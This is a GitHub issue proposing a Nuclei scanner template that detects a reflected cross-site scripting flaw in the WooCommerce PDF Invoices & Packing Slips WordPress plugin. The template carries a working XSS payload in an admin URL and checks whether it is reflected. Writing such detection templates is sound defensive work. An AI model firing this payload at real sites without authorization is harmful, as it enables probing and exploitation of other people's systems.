### ISSUE TITLE
WooCommerce PDF Invoices & Packing Slips < 2.15.0 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4699]
```yaml
id: woocommerce-pdf-invoices-xss

info:
  name: WooCommerce PDF Invoices & Packing Slips < 2.15.0 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents&section=invoice&"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'
          - "WooCommerce PDF Invoices"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
